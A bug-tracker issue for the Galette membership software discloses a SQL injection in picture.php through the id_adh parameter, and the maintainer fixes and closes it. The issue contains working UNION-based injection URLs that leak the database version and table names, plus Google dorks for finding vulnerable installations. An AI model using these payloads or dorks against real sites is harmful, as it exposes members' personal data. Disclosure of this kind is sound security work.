Project

General

Profile

Actions

Anomalie #250

closed

Security: SQL Injection in picture.php via param idh_adh affect by versions 0.63, 0.63.1, 0.63.2, 0.63.3, 0.64rc1

Added by sbz sbz over 12 years ago. Updated over 12 years ago.

Status:
Fermé
Priority:
Immédiat
Category:
Core
Target version:
-
Start date:
05/09/2012
Due date:
% Done:

100%

Estimated time:
Version utilisée:

Description

Hi developers,

I've discovered a SQL injection in Galette software on 0.63 branch version and it's seems not fixed regarding the ChangeLog here [1]. The advisory below:

Affected versions

It seems only versions listed here are vulnerable :

  • 0.63
  • 0.63.1
  • 0.63.2
  • 0.63.3
  • 0.64rc1

Vulnerability

The vulnerability is located in file includes/picture.class.php at L.71-73 (cf. [2])

 ...
         $sql = "SELECT picture,format
                 FROM ".PREFIX_DB."pictures
                 WHERE id_adh=".$id_adh;
 ...

$id_adh is an input controlled by the user in file picture.php and not filtered at line L.35-36 (cf. [3]) :

 ...
 else
           $id_adh = $_GET['id_adh'];
 ...

Exploitation

The queries below allow to inject SQL injection to create a data leak in order to retrieve datas on database and server configuration on a Galette fresh installation

- Leak MySQL Version

/picture.php?id_adh=0+and+1=0+union+select+@@version,null

- Leak tables name on a MySQL 5.x (group_concat is limiting output here)

/picture.php?id_adh=0+and+1=0+union+select+group_concat(table_name,char(10)),null+from+information_schema.tables

I don't want to show too many exploitable queries to avoid the usage by kiddies but it's possible to inject hard queries in order to leak adherents datas.

Impact of the vulnerablity

Galette is a well known adherent web interface used by lots of associations (specially French one), it's possible to look for vulnerable targets using the Google dorks below:

  • inurl:self_adherent.php intitle:"Galette v0.63"
  • inurl:self_adherent.php intitle:Galette

The impact is to create database data leaks exposure on any vulnerable Galette installation.

Mitigation of the vulnerability

Update to 0.7.x version

Discovered by

Sofian Brabez <>

Timeline

  • 09/05/2012: Contact vendor through bug tracker on redmine.ulysses.fr

References

[1] http://galette.tuxfamily.org//documentation/fr/changelog.html
[2] http://svn.gna.org/viewcvs/galette/branches/galette-0-63-bugfix/galette/includes/picture.class.php?revision=826&view=markup
http://git.tuxfamily.org/galette/galette?p=galette/galette.git;a=blob;f=includes/picture.class.php;h=9c4985eeb37369c9b64af6e11e6840645474fb2c;hb=7b4b477b0349f00c7555cbd66870ff6f22831faf#l70
[3] http://svn.gna.org/viewcvs/galette/branches/galette-0-63-bugfix/galette/picture.php?revision=825&view=markup
http://git.tuxfamily.org/galette/galette?p=galette/galette.git;a=blob;f=picture.php;h=8ec80ab9f67b66f2fced141d9512332cf64f334e;hb=7b4b477b0349f00c7555cbd66870ff6f22831faf#l35

Actions #1

Updated by Johan Cwiklinski over 12 years ago

  • Status changed from Nouveau to In Progress
Actions #2

Updated by Johan Cwiklinski over 12 years ago

  • Description updated (diff)
Actions #3

Updated by Johan Cwiklinski over 12 years ago

  • % Done changed from 0 to 90
  • Status changed from In Progress to Résolu

Fixed in commit 8c13ec159b.

New releases will come very soon.

Actions #4

Updated by Johan Cwiklinski over 12 years ago

  • % Done changed from 90 to 100
  • Status changed from Résolu to Fermé
Actions

Also available in: Atom PDF